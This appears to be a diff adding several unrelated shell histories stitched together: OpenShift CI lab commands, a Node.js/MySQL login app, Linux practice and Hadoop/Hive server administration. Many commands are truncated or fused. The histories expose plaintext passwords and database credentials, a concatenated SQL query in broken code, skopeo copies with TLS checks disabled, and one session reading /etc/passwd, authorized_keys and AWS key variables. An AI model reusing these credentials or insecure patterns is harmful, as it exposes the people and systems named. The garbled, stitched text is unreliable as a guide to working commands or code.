+oc start-build ola-binary --from-file=$HOME/ola/target/ola.jar --follow +oc new-app ola-binary +oc expose svc/ola-binary --port=8080 +curl'{{ .spec.host }}')/api/ola +ls +ls +mvn clean install -DskipTests=true -s ./nexus_settings.xml +mvn test -s ./nexus_settings.xml +mvn -s ./nexus_settings.xml deploy -DskipTests=true -DaltDeploymentRepository=nexus::default:s3 -n abi-nexus --template='{{ .spec.host }}')/repository/releases +skopeo copy --src-tls-verify=false --dest-tls-verify=false --src-creds=openshift:$(oc whoami -t) --dest-creds=admin:admin123 docker://docker-registry-default.apps.na39.openshift.opentlc.com/abi-jenkins/jenkins-agent-appdev docker://$(oc get route nexus-registry -n abi-nexus --template='{{ .spec.host }}')/abi-jenkins/jenkins-agent-maven-appdev:v3.11 +skopeo copy --src-tls-verify=false --dest-tls-verify=false --src-creds=openshift:$(oc whoami -t) --dest-creds=user16:r3dh4t1! docker://docker-registry-default.apps.na39.openshift.opentlc.com/abi-jenkins/jenkins-agent-appdev docker://$(oc get route nexus-registry -n abi-nexus --template='{{ .spec.host }}')/abi-jenkins/jenkins-agent-maven-appdev:v3.11 +skopeo copy --src-tls-verify=false --dest-tls-verify=false --src-creds=openshift:$(oc whoami -t) --dest-creds=admin:admin123 docker://docker-registry-default.apps.na39.openshift.opentlc.com/abi-jenkins/jenkins-agent-appdev docker://$(oc get route nexus-registry -n abi-nexus --template='{{ .spec.host }}')/abi-jenkins/jenkins-agent-maven-appdev:v3.11 +skopeo copy --src-tls-verify=false --dest-tls-verify=false --src-creds=openshift:$(oc whoami -t) --dest-creds=admin:admin123 docker://docker-registry-default.apps.bd2b.openshift.opentlc.com/abi-jenkins/jenkins-agent-appdev docker://$(oc get route nexus-registry -n abi-nexus --template='{{ .spec.host }}')/abi-jenkins/jenkins-agent-maven-appdev:v3.11 +mvn sonar:sonar -s ./nexus_settings.xml -Dsonar.host.urlsonarqube -n abi-sonarqube --template='{{ .spec.host }}') +oc get route +ls +lsls +ls +oc new-project abi-builds +git cloneshift-tasks.git +git remote add private +[abifoluwa.oni-capgemini.com@bastion 128 ~]$ +git remote add privates-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks-private.git +git remote add privates-abi-gogs.apps.bd2b.openshift.opentlc.com/CICDLabs/openshift-tasks-private.git +git push private master +oc new-app --template=eap71-basic-s2i --param APPLICATION_NAME=tasks --param SOURCE_REPOSITORY_URLs.abi-gogs.svc.cluster.local:3000/CICDLabs/openshift-tasks-private.git --param SOURCE_REPOSITORY_REF=master --param CONTEXT_DIR=/ --param MAVEN_MIRROR_URLs3.abi-nexus.svc.cluster.local:8081/repository/maven-all-public +oc logs -f tasks-1-build +oc describe pod tasks-1-build +oc create secret generic gogs-secret --from-literal=username= --from-literal=password= +oc create secret generic gogs-secret --from-literal=username=oniabifo@gmail.com --from-literal=password=BAloko50. +oc set build-secret --source bc/tasks gogs-secret +oc start-build tasks +oc patch bc/tasks --patch='{"spec": {"strategy": {"sourceStrategy": {"incremental": true}}}}' +oc patch bc/tasks --patch='{"spec": {"strategy": {"sourceStrategy": {"forcePull": false}}}}' +oc start-build tasks +oc logs -f tasks-3-build +git clone +mvn clean package +java -jar ola/target/ola.jar +oc import-image jorgemoralespou/s2i-go --confirm +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +oc import-image jorgemoralespou/s2i-go --confirm +oc new-build s2i-gose-chained-builds --context-dir=/go-scratch/hello_world --name=builder +oc describe is builder +oc new-build --name=runtime --source-image=builder --source-image-path=/opt/app-root/src/go/src/main/main:. --dockerfile=$'FROM scratch +COPY main /main +EXPOSE 8080 +ENTRYPOINT ["/main"]' +oc describe is builder +oc new-build --name=runtime --source-image=builder --source-image-path=/opt/app-root/src/go/src/main/main:. --dockerfile=$'FROM scratch +COPY main /main +EXPOSE 8080 +ENTRYPOINT ["/main"]' +oc logs -f bc/runtime +oc new-app runtime --name=my-application +oc expose svc/my-application +curl $(oc get route my-application --template='{{ .spec.host }}') +ls +oc project abi-sonarqube +oc new-project abi-tasks-dev --display-name "Tasks Development" +oc policy add-role-to-user edit system:serviceaccount:abi-jenkins:jenkins -n abi-tasks-dev +oc new-build --binary=true --name="tasks" jboss-eap71-openshift:1.3 -n xyz-tasks-dev +oc new-build --binary=true --name="tasks" jboss-eap71-openshift:1.3 -n abi-tasks-dev + imagestream "tasks" created +oc new-app abi-tasks-dev/tasks:0.0-0 --name=tasks --allow-missing-imagestream-tags=true -n abi-tasks-dev +oc status +oc status -v +oc set triggers dc/tasks --remove-all -n abi-tasks-dev +oc expose dc tasks --port 8080 -n abi-tasks-dev +oc expose svc tasks -n abi-tasks-dev +oc create configmap tasks-config --from-literal="application-users.properties=Placeholder" --from-literal="application-roles.properties=Placeholder" -n abi-tasks-dev +oc set volume dc/tasks --add --name=jboss-config --mount-path=/opt/eap/standalone/configuration/application-users.properties --sub-path=application-users.properties --configmap-name=tasks-config -n abi-tasks-dev +oc set volume dc/tasks --add --name=jboss-config1 --mount-path=/opt/eap/standalone/configuration/application-roles.properties --sub-path=application-roles.properties --configmap-name=tasks-config -n abi-tasks-dev +oc new-project abi-tasks-prod --display-name "Tasks Production" +oc policy add-role-to-group system:image-puller system:serviceaccounts:abi-tasks-prod -n abi-tasks-dev +oc policy add-role-to-user edit system:serviceaccount:abi-jenkins:jenkins -n abi-tasks-prod +oc new-app abi-tasks-dev/tasks:0.0 --name=tasks-blue --allow-missing-imagestream-tags=true -n abi-tasks-prod +oc set triggers dc/tasks-blue --remove-all -n abi-tasks-prod +oc expose dc tasks-blue --port 8080 -n abi-tasks-prod +oc create configmap tasks-blue-config --from-literal="application-users.properties=Placeholder" --from-literal="application-roles.properties=Placeholder" -n abi-tasks-prod +oc set volume dc/tasks-blue --add --name=jboss-config --mount-path=/opt/eap/standalone/configuration/application-users.properties --sub-path=application-users.properties --configmap-name=tasks-blue-config -n abi-tasks-prod +oc set volume dc/tasks-blue --add --name=jboss-config1 --mount-path=/opt/eap/standalone/configuration/application-roles.properties --sub-path=application-roles.properties --configmap-name=tasks-blue-config -n abi-tasks-prod +oc new-app abi-tasks-dev/tasks:0.0 --name=tasks-green --allow-missing-imagestream-tags=true -n abi-tasks-prod +oc set triggers dc/tasks-green --remove-all -n abi-tasks-prod +oc expose dc tasks-green --port 8080 -n abi-tasks-prod +oc create configmap tasks-green-config --from-literal="application-users.properties=Placeholder" --from-literal="application-roles.properties=Placeholder" -n abi-tasks-prod +oc set volume dc/tasks-green --add --name=jboss-config --mount-path=/opt/eap/standalone/configuration/application-users.properties --sub-path=application-users.properties --configmap-name=tasks-green-config -n abi-tasks-prod +oc set volume dc/tasks-green --add --name=jboss-config1 --mount-path=/opt/eap/standalone/configuration/application-roles.properties --sub-path=application-roles.properties --configmap-name=tasks-green-config -n abi-tasks-prod +oc expose svc/tasks-blue --name tasks -n abi-tasks-prod +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +mvn clean project +ls +ls +nano nexus_settings.xml +ls +nano nexus_openshift_settings.xml +ls +nano nexus_settings.xml +nano nexus_openshift_settings.xml +mvn clean package +git commit -m "Updated Settings" nexus_settings.xml nexus_openshift_settings.xml +git push gogs master +nano nexus_settings.xml +ls +nano nexus_openshift_settings.xml +git commit -m "Updated Settings" nexus_settings.xml nexus_openshift_settings.xml +git push gogs master +nano nexus_openshift_settings.xml +oc login -u user16 -p r3dh4t1!ster.bd2b.openshift.opentlc.com +// Blue/Green Deployment into Production +// ------------------------------------- +// Do not activate the new version yet. +def destApp = "tasks-green" +def activeApp = "" +stage('Blue/Green Production Deployment') { + // Replace abi-tasks-dev and abi-tasks-prod with + // your project names + activeApp = sh(returnStdout: true, script: "oc get route tasks -n abi-tasks-prod -o jsonpath='{ .spec.to.name }'").trim() + if (activeApp == "tasks-green") { + destApp = "tasks-blue" + } + echo "Active Application: " + activeApp + echo "Destination Application: " + destApp + // Update the Image on the Production Deployment Config + sh "oc set image dc/${destApp} ${destApp}=docker-registry.default.svc:5000/abi-tasks-dev/tasks:${prodTag} -n abi-tasks-prod" + // Update the Config Map which contains the users for the Tasks application + sh "oc delete configmap ${destApp}-config -n abi-tasks-prod --ignore-not-found=true" + sh "oc create configmap ${destApp}-config --from-file=./configuration/application-users.properties --from-file=./configuration/application-roles.properties -n abi-tasks-prod" + // Deploy the inactive application. + // Replace abi-tasks-prod with the name of your production project + openshiftDeploy depCfg: destApp, namespace: 'abi-tasks-prod', verbose: 'false', waitTime: '', waitUnit: 'sec' + openshiftVerifyDeployment depCfg: destApp, namespace: 'abi-tasks-prod', replicaCount: '1', verbose: 'false', verifyReplicaCount: 'true', waitTime: '', waitUnit: 'sec' + openshiftVerifyService namespace: 'abi-tasks-prod', svcName: destApp, verbose: 'false' +export VERSION=1.1 +mvn versions:set -f pom.xml -s nexus_settings.xml -DgenerateBackupPoms=false -DnewVersion=${VERSION} +git add pom.xml src/main/webapp/index.jsp +git commit -m "Increased version to ${VERSION}" +git push private master +git pull +git push private master +git pull master:dev +git pull +git push -u origin master +git pull +git push private master +git fetch private master +git mergeprivate master +git merge private master +git push private master +git pull +git push private master + +git fetch private master +git merge private master +git merge master +git push -u origin master +git push private master +ls +nano nexus_settings.xml +nano nexus_openshift_settings.xml +ls +git pull +ls +git fetch +ls +git push private master +git fetch origin +ls +git pull -rebase +git pull --rebase +git status +ls -a +rm -rf .nexus_settings.xml.sw* +ls +ls -a +git push +git push private master +git status +git add +git add . +ls +git push private master +git pull +git pull private master +git commit private master +git commit -m "Testing" +git commit -m "Testing" private master +git commit -m private master "Testing" +git stash private master +git stash +git stash pop +git push private master +ls -a +nano Jenkinsfile +git push private master +git pull private master +ls +rm -rf Jenkinsfile +git pull private master +ls +git push private master +export VERSION=1.1 +mvn versions:set -f pom.xml -s nexus_settings.xml -DgenerateBackupPoms=false -DnewVersion=${VERSION} +git add pom.xml src/main/webapp/index.jsp +git commit -m "Increased version to ${VERSION}" +git push private master +export VERSION=1.2 +mvn versions:set -f pom.xml -s nexus_settings.xml -DgenerateBackupPoms=false -DnewVersion=${VERSION} +git add pom.xml src/main/webapp/index.jsp +git commit -m "Increased version to ${VERSION}" +git push private master +git commit -m "Increased version to ${VERSION}" +git push private master +export VERSION=1.3 +mvn versions:set -f pom.xml -s nexus_settings.xml -DgenerateBackupPoms=false -DnewVersion=${VERSION} +git add pom.xml src/main/webapp/index.jsp +git commit -m "Increased version to ${VERSION}" +git push private master +oc project +oc project abi-jenkins +oc projects +oc project +ls +oc project +echo "apiVersion: v1 +items: +- kind: "BuildConfig" + apiVersion: "v1" + metadata: + name: "tasks-pipeline" + spec: + source: + type: "Git" + git: + uri: + strategy: + type: "JenkinsPipeline" + jenkinsPipelineStrategy: + jenkinsfilePath: Jenkinsfile +kind: List +ls +oc project +echo "apiVersion: v1 +items: +- kind: "BuildConfig" + apiVersion: "v1" + metadata: + name: "tasks-pipeline" + spec: + source: + type: "Git" + git: + uri: + strategy: + type: "JenkinsPipeline" + jenkinsPipelineStrategy: + jenkinsfilePath: Jenkinsfile +kind: List +metadata: []" | oc create -f - -n abi-jenkins +oc secrets new-basicauth gogs-secret --username=oniabifo --password=BAloko50. -n abi-jenkins +oc create secret gogs-secret --username=oniabifo --password=BAloko50. -n abi-jenkins +oc secrets new-basicauth gogs-secret --username=oniabifo --password=BAloko50. -n abi-jenkins +oc set build-secret --source bc/tasks-pipeline gogs-secret -n abi-jenkins +oc secrets new-basicauth gogs-secret --username=oniabifo@gmail.com --password=BAloko50. -n abi-jenkins +oc set build-secret --source bc/tasks-pipeline gogs-secret -n abi-jenkins +oc secrets new-basicauth gogs-secret --username=oniabifo@gmail.com --password=BAloko50. -n abi-jenkins +ls +oc set build-secret --source bc/tasks-pipeline gogs-secret -n abi-jenkins +oc secrets new-basicauth gogs1-secret --username=oniabifo@gmail.com --password=BAloko50. -n abi-jenkins +oc set build-secret --source bc/tasks-pipeline gogs1-secret -n abi-jenkins +ls +nano nexus_openshift_settings.xml +nano nexus_settings.xml +ls +node app +node app +node app +ls +node register +logout +node app +node app +Error: ER_WRONG_VALUE_COUNT_ON_ROW: Column count doesn't match value count at row 1 + at Query.Sequence._packetToError (/usr/lib/node_modules/mysql/lib/protocol/sequences/Sequence.js:32:14) + at Query.ErrorPacket (/usr/lib/node_modules/mysql/lib/protocol/sequences/Query.js:78:18) + at Protocol._parsePacket (/usr/lib/node_modules/mysql/lib/protocol/Protocol.js:156:24) + at Parser.write (/usr/lib/node_modules/mysql/lib/protocol/Parser.js:60:12) + at Protocol.write (/usr/lib/node_modules/mysql/lib/protocol/Protocol.js:31:16) + at Socket.ondata (stream.js:38:26) + at Socket.EventEmitter.emit (events.js:93:17) + at TCP.onread (net.js:396:14) + at process._makeCallback (node.js:248:20) + -------------------- + at Query.Sequence (/usr/lib/node_modules/mysql/lib/protocol/sequences/Sequence.js:15:21) + at new Query (/usr/lib/node_modules/mysql/lib/protocol/sequences/Query.js:11:12) + at Protocol.query (/usr/lib/node_modules/mysql/lib/protocol/Protocol.js:40:24) + at Connection.query (/usr/lib/node_modules/mysql/lib/Connection.js:92:25) + at Object.exports.RegisterUser (/home/danu2_md2/routes/register.js:16:13) + at /home/danu2_md2/app.js:44:14 + at callbacks (/home/danu2_md2/node_modules/express/lib/router/index.js:161:37) + at multipart (/home/danu2_md2/node_modules/express/node_modules/connect/lib/middleware/multipart.js:60:27) + at /home/danu2_md2/node_modules/express/node_modules/connect/lib/middleware/bodyParser.js:57:9 + at urlencoded (/home/danu2_md2/node_modules/express/node_modules/connect/lib/middleware/urlencoded.js:48:27) + +ls -a +node app +node register +logout +node app +node app +node register +node app +ls -a +ls +ls +ls -a +ls +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +TypeError: Cannot call method 'replace' of undefined +node app +node app +npm install +node app +node app +node app +node app +node app +node app +node app + throw new Error('Can\'t set headers after they are sent.'); +node app +node app +node app +node app +node app +node app +node app +npm install passport +node app +node app +npm install passport-local +node app +node app +node app +node app +node app +node app +ls -a +mode app +node app +ls +cat login html +cat login.html +ls +ls +node app +node register +ls -a +node register +ls +ls -a +cat form.html +ls +history +logout +ls -a +node app +LS +ls +node login +node app +ls -a +history +node app +logout +ls -a +node app +node login +ls +logout +ls + +logout +ls -a +ls +cat routes +ls +ls +cat login.js +stel.com/ +stances/250x250/26700843.jp +l +ls +ls +node app +node register +node login +logout +ls +node login +cat login.js +ls-a +ls -a +node login +node app +node register +node login +logout +ls +cat app.js +ls -a +node app.js +ls +ls +node app +ls +ls +node index +node user +node register +node login +ls +ls +jade index +jade layout.jade +ls +ls +jade home +ls +ls +node form.html +ls +node login +node app +logout +ls +ls +node app +ls -a +node login +node app +node app +logout +node app +node app.js +node login +node register +ls -a +ls +ls -a +node app +node list +node list +node app +node app +node app +node app +node app +node app +node all +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +ls +node app +node login +ls +ls +ls -a +node login +node register +node login.js +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +ls +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +logout +node app +node app +node app +node app +node app +node app +node app +Error: listen EADDRINUSE +Error: listen EADDRINUSE +ps | grep node +ps | grep node +node app +node app +cat app.js +ls +ls +ls +pwd +pwd +cat login.js +vi login.js +node app +node app +node app +node app +TypeError: Object darren has no method 'send' +node app +node app +node app +node app +cat login.js +exports.LoginUser = function (res, req) +{ var express = require('express'); + var http = require('http'); + var util = require('util'); + var path = require('path'); + var mysql = require('mysql'); + var fs = require('fs'); +var connection = mysql.createConnection( + { host : 'danu2.it.nuigalway.ie',; user : 'mydb1155',; password : 'mydb11555',; database : 'mydb1155',; } + ); +var queryString = 'SELECT username , password FROM USERS WHERE username = ' + ' "user.usernameForm" AND ' + ' password = ' + ' "user.passwordform" ' ; +connection.query(queryString, function(err, rows, fields) { + if (err) throw err; + console.log(rows[0]); + if (rows[0] = null ); { // res.send("try again"); + console.log('try again!'); + } + else + { console.log("User is logged in"); + console.log(queryString); + } + }); +cat login.js +node app +ls +ls -a +node app +ls -a +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +TypeError: Object # has no method 'redirect' +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app + j@mail.com : jim : duggan : test +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app_v1 +node app_v1 +node app_v1 +node app_v1 +ls +node app_vi_files +node app_v1 +node app_v1 +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +ls +node app_v1 +node app_v1.js +node app +ls +node app +logout +logout +node app +node app +node app +logout +logout +clear +ls +exit +ls +ls +ls -la +ls +ls +ls -la +mkdir Emerson Leandro Moraes +ls +> teste +ls +ls -la +cat tste +cat teste +man teste +nano teste +clear +$PATH +PATH +$PATH +su +sudo su +sudo su - +su +ls +ls +ls -la +ls +ls +cat teste +nano +ls +cat teste +logout +exit +clear +vi +clear +su +sudo su +ls -la +ls -la +ls +clear +-mcedit +mcedit +clear +pico +nano +nano Emerson.txtx +ls -la +namo +nano +cat nano +cat emerson.txtx +cat emerson.txt +echo teste para arquivo nano > emerson.txt +cat emerson.txt +echo teste para arquivo nano >> emerson.txt +cat emerson.txt +echo arquivo nano << emerson.txt +echo arquivo nano < emerson.txt +teste +quit +exit +exit + +echo arquivo nano << +echo arquivo nano << emerson.txt +teste do namo +ok ! + +echo arquivo nano >>arquivo.txt +cat arquivo.txt +logout +exsit +exit +w +w +uname -a +cat /etc/passwd +vi .ssh/authorized_keys +sudo su - +sudo su 0 +sudo su - +ls +ls +cat startup.sh +ls +exit +sudo su - +ls +exit +sudo su - +echo $AWS_ACCESS_KEY_ID +printenv +exit +sudo su - +sudo su - +sudo su - +ls -ltr +ls -la +ls -ltr +ls +ls -ltr +du -sh * +ls +ls +ls +ls -ltr +ls +ls -ltr +du -sh * +ls -ltr +hostaname +hostname +curl ifconfig.me +w +lsb_release -a +df -h +nginx -t +ps -aux | grep nginx +ps -ux +ps -uxa +ls +ls -ltr +clear +blueprint --list +blueprint -list +blueprint-list +blueprint-list -a +blueprint-list -q +sudo su - +s +pa -aux | grep aws +ps -aux | grep aws +ls -ltr +ls -ltr /var/www/html/index.lighttpd.html +service nginx status +updatedb +ls -lta +/etc/init.d/nginx status +ls -ltah +clear +ls- ltrF +ls -ltrF +ls -ltrF +sudo su - +sudo su - +lsb_release -a +w +sudo su - +sudo su - +sudo su - +sudo su - +ls +ls +sudo rm -r mahout +sudo mv apache-mahout-distribution-0.10.1 mahout +ls +ls +source /etc/profile +source ~/.bashrc +mahout --help +mahout +ll +mysql -uroot -p +sudo mysql -uroot -p +mysql -uhive -p +R +su air +ls +ll +echo $SPARK_HOME +ls +ls +cat slaves +ll +ll +ls +sudo chmod 755 log4j.properties +cat spark-env.sh +./run-example org.apache.spark.examples.SparkPi local +locate run-example +run-example org.apache.spark.examples.SparkPi local +ls +run-example org.apache.spark.examples.SparkPi spark:// +su air1 +su air2 +ls +sudo service mysql restart +mysql -u mysql -p +su air +pwd +ls +ls +ls +ls +cpwd +pwd +ls +ls +ls +ls +vim my.cnf +sudo vim my.cnf +souce /etc/profile +source /etc/profile +service mysqld restart +sudo vim my.cnf +mysql -u root +mysql -u root -p +service +service mysqld restart +sudo service mysqld restart +sudo service mysql restart +sudo -u root -p +sudo mysql -u root -p +sudo vim /etc/mysql/my.cnf +sudo service mysql restart +mysql -u root +mysql -u root -p +mysql -uroot -p +ls +ls +ls +sudo cd mysql/ +sudo cd mysql +ls +ls -l +chown -R mysql:mysql /var/lib/mysql/database_name +sudo chown -R mysql:mysql /var/lib/mysql/database_name + +sudo chown -R root:root /var/lib/mysql/database_name +sudo chown -R root:root /var/lib/mysql +ls -l +sudo cd mysql/ +sudo chown -R air:air /var/lib/mysql +ls +ls -l +sudo chown -R root:root /var/lib/mysql +sudo chown -R mysql:mysql /var/lib/mysql +ll +ls +ls -l +sudo chown -R root:mysql /var/lib/mysql +ls -l +sudo chown -R mysql:mysql /var/lib/mysql +ls -l +ll +ls +hive +ls +hive +hadoop +hadoop fs -ls /user/ +ls +ls +ls +pwd +ls +ls +cat hadoop +ssh new001 +ls +cat limits. +cat limits.d +cat limits.conf +ulimit -n +cat limits.conf +ulimit -a +renice +10 `ps aux | awk '{ if ($3 > 0.8 && id -u $1 > 500) print $2}'` +top +ulimit +ulimit --help +ulimit -help +top +sudo vim limits.conf +ls +sudo vim common-session +sudo vim /etc/profile +jps +hadoop fs -ls / +hadoop version +start-all.sh +hadoop fs -ls / +ls +ll +cat hadoop +vim hadoop +java -version +hadoop version +ll +ls +start-all.sh +hive +ls +cat hdfs +ls +sudo scp -r hdfs hadoop/bin/ +start-all.sh +jps +hadoop fs -ls / +ls +top +ls +ls +ls -l +ls +mkdir s +sudo mkdir s +ls +rm -r s +sudo rm -r s +ls +hive +mahout +mahout trainlogistic --input donut.csv --output ./model --target color --categories 2 --predictors x y --types numeric --features 20 --passes 100 --rate 50 ##运行模型 +ls +ls +mysql -uroot -p +su air +spark +pyspark +spark +jps +spark +pyspark +hadoop fs -ls / +start-all.sh +locate hadoop-env.sh +ls +cat hadoop-env.sh +echo $HADOOP_SECURE_DN_USER +hadoop fs -ls / +ls +cat hadoop-env.sh +echo $JAVA_HOME +sudo vim hadoop-env.sh +source /etc/profile +start-all.sh +hadoop fs -ls / +hive +mysql -uroot -p +ls +sudo mkdir mysql +ls +ll +ls +rpm -qa|grep mysql +sudo apt-get install rpm +sudo rpm -e --nodeps mysql-libs-5.1.71-1.el6.x86_64 +ls +rz +ls +ls +ls +ls +ls +sudo mv data exercise +ls +ll +sudo chmod -r 774 /exercise +sudo chmod -r 774 exercise +sudo chmod 774 exercise +ll +ls +ping www.baidu.com +clear +start-all.sh +jps +hadoop fs -ls / +lastlog +ls +mahout +spark +clear +fdisk -l +fdisk -l more /proc/partions +df -h ++ +fdisk -l +ls +sudo mkdir data +sudo mount /dev/sde1 /tmp/data +ls +ls +uuu +sudo umount /tmp/data +sudo umount /tmp/data +ls +ls + +sudo mount /dev/sde1 /tmp/data +ls +ls +sudo scp -r data /home/dmc +ls +sudo umount /tmp/data +ls +clear +clear +~ +MYSQL +mysql +ADMC123 +mysql -UROOT -P +mysql -uroot -p +ls +mysql -uhive -p +mysql -uroot -p +mysql -uroot -pmysql +ll +top +ls +ll +htop +free -m +hive +sudo /etc/profile +ls +start-all.sh +jps +hadoop fs -ls / +hive +sudo -uhive -p +sudo -uroot -p +mysql -uroot -p +mysql -umysql -p +mysql -uhive -p +hadoop fs -ls / +ls +hadoop version +java version +echo JAVA_HOME +echo $JAVA_HOME +cat /etc/profile +top +jps +df -h +df -h /home +sudo apt-get install quota +sudo apt-get install samba-common +sudo apt-get install smbclient +ll +ll d* +sudo apt-get install smbclient +ll +sudo mv info info.bak +sudo mv info info.bak.1 +sudo mkdir info +sudo apt-get install quota +sudo vim /etc/fstab +df -h /home + +ls +ls +cat fstab.d/ +ls +ll +sudo cp fstab fstab.old +ls +sudo vim fstab +df -h /home +sudo vim fstab +top +ll +df -h /home/ +ll +ll +top +sudo rebot +sudo reboot +ping www.baidu.com +if config eth0 up; ,; dsjcioj; +ping www.baidu.com +route add default gw +cat /etc/resolv.conf +service network restart +service ssh status +service sshd start +sudo apt-get update +R +ping www.baidu.com +cat /etc/issue +ls +ll +ping www.baidu.com +ls +sudo vim interfaces +sudo reboot +sudo apt-get update +sudo apt-get install r-base +ls +ls +sudo rm -f foomatic-filters +LS +ll +sudo rm -f foomatic-filters +ls +sudo apt-get update -f +ls +sudo mv info info.bak.2 +sudo mkdir info +sudo apt-get install r-base +R +ls +ping www.baidu.com +ll -d /a* +quotaon +lastlog +edquota -u ruc15 +cat /etc/fstab +edquota -u +edquota -u air1 +edquota -u air1(uid 1009) +sudo edquota -u air1(uid 1009) +sudo edquota -u air1 +quota -gvs +sudo edquota -u air1 +sudo vim edquota -u air1 +sudo edquota -u air1 +edquota -p air1 -u air2 +sudo edquota -p air1 -u air2 +sudo edquota -p air1 -u air3 +sudo edquota -p air1 -u air4 +sudo edquota -p air1 -u air5 +lastlog +sudo edquota -p air3 +sudo edquota -p air2 +sudo edquota -u air2 +sudo edquota -u air3 +sudo edquota -p air1 -u mobile1 +sudo edquota -p air1 -u mobile2 +sudo edquota -p air1 -u mobile3 +sudo edquota -p air1 -u mobile4 +sudo edquota -p air1 -u mobile5 +sudo edquota -p air1 -u ruc15 +sudo edquota -p air1 -u pku15 +sudo edquota -p air1 -u cufe15 +sudo edquota -p air1 -u cueb15 +sudo edquota -p air1 -u ustc15 +sudo edquota -p air1 -u bjut15 +edquota -t +QUOTA -U +quota -u +quota -u air1 +sudo quota -uvs air1 air2 +sudo quota -u air2 +quotaon +quotaon -avug +sudo quotaon -avug +renice +10 `ps aux | awk '{ if ($3 > 0.8 && id -u $1 > 500) print $2}'` +ping www.baidu.com +R +top +df -i +top +su air4 +ls +edquota -u air1 +sudo edquota -u air1 +repquota -a +sudo repquota -a +edquota -p air1 -u air2 +sudo edquota -p air1 -u air2 +sudo edquota -p air1 -u air3 +sudo edquota -p air1 -u air4 +sudo edquota -p air1 -u air5 +sudo edquota -p air1 -u mobile1 +sudo edquota -p air1 -u mobile2 +sudo edquota -p air1 -u mobile3 +sudo edquota -p air1 -u mobile4 +sudo edquota -p air1 -u ruc15 +sudo edquota -p air1 -u pku15 +sudo edquota -p air1 -u cufe15 +sudo edquota -p air1 -u cueb15 +sudo edquota -p air1 -u ustc15 +sudo edquota -p air1 -u bjut15 +sudo repquota -a +sudo apt-get install r-base r-base-dev +R +IPYTHON +ipython +su air1 +su air2 +hive +echo $HIVE_HOME +LL +ll +groups air1 +su air1 +su air2 +ls +top +ls +ls +ls +ls +ls +free -m +ls +bin +ls +hive +top +mysql -uroot -p +ls +sudo cd /home/air/wgb +ls +ls +sudo cd wgb/ +ls +top +ls +free +jps +pyspark +jps +start-all.sh +jps +start-all.sh +su new002 +ssh new002 +jps +ls +ls /home +ls +sudo rm -r hadoop-native-64-2.6.0.tar +ls +mysql -uroot -p +sudo cd /home/air/wgb/standalone +sudo +su dmc +ls +sudo cd /home/air/wgb/standalone +sudo /home/air/wgb/standalone +sudo cd /home/air/wgb/standalone +echo $PATH +ls +mkdir /home/air1/wgb +sudo mkdir /home/air1/wgb +sudo cd /home/air1/wgb +sudo cd /home +ls +sudo cd wgb/ +ls +ls +ls +ls +ls +wq +hive +ls +sudo cp mydata2.csv /home/air1/wgb +ls +sudo cp result2.txt /home/air1/wgb +LS +ls +top +ls +ls +ll +ls +ll +ll +R +su root +ls +ll +ls +locate iotmp +chmod 755 iotmp +sudo chmod 755 iotmp +locate iotmp +pwd +ls +locate iotmp +ls +ll +ls +sudo mkdir iotmp +ll +sudo chown dmc:hadoop iotmp +ll +hive +ll +cat map.R +ls +ls +ll +ls +ll +ll +ls +ls +ls +ll +ls +sudo mkdir iotmp +ls +ll +sudo chown dmc:hadoop iotmp +ll +ls +ls +hive +LS +ls +ls +ll +ls +cat hive-env.sh +ls +cat hive-config.sh +locate hive-site.xml +cat hive +cat hive-site.xml +sudo vim hive-site.xml +ls +sudo mkdir iotmp +ls +ll +sudo chown dmc:hadoop iotmp +ll +sudo chmod 777 iotmp +ll +ll +ls +mkdir software +ls +sudo cp apache-maven-3.3.9-bin.tar.gz software +sudo mv apache-maven-3.3.9-bin.tar.gz software +sudo mv mysql-5.5.47-linux2.6-x86_64 software/ +ls +sudo mv MySQL-5.5.47-1.linux2.6.x86_64.rpm-bundle.tar software/ +sudo mv hadoop-native-64-2.6.0.tar software/ +sudo mv mahout-collections-1.0-bin.zip software/ +sudo mv mysql-connector-java-5.1.* software/ +sudo mv apache-hive-1.* software/ +ls +sudo mv apache-mahout-distribution-0.10.1.tar.gz software/ +sudo mv cmake-3.4.1.tar.gz +sudo mv cmake-3.4.1.tar.gz software/ +ls +sudo mv mysql-5.5.47-linux2.6-x86_64.tar.gz software/ +rm -r 001.txt +ls +cat bashrc +ls +rm -r configuration/ +sudo rm -r configuration/ +ls +sudo rm -r authorized_keys +ls +ll +cat hdfs +ls +sudo rm -r hdfs +ls +sudo rm -r bashrc +l +sudo rm -r derby.log +ls +cat /etc/profile +ls +ls +ls +ls +ll +ls +sudo mv setupfile/ software/ +ls +ls +ls +ls +sudo mv lrq/ software/ +ls +ls +sudo rm -r wxn +ls +sudo rm -r hive1.1/ +ls +R +ssh dmc@ +ls +su air1 +mysql -uroot -pdmc1056 +sudo vim hive-site.xml +top +hadoop fs -ls / +groups mobile +hadoop fs -ls /user/hive +hadoop fs chmod 775 /user/hive +sudo hadoop fs chmod 775 /user/hive +sudo hadoop fs -chmod 775 /user/hive +sudo hadoop fs chmod -R 775 /user/hive +sudo hadoop chmod -R 775 /user/hive +hadoop fs -chmod -R 775 /user/hive +hadoop fs -ls / +hadoop fs -ls /user +ls +ls +sudo vim hive-site.xml +su mobile +hive +su air +su mobile +hive +hive +sudo vim hive-site.xml +hive +su root +hive +ls +hive +ls +hive +ls +hive +show tables; +hive +free -m +cat /etc/security/limits.conf +sudo vim 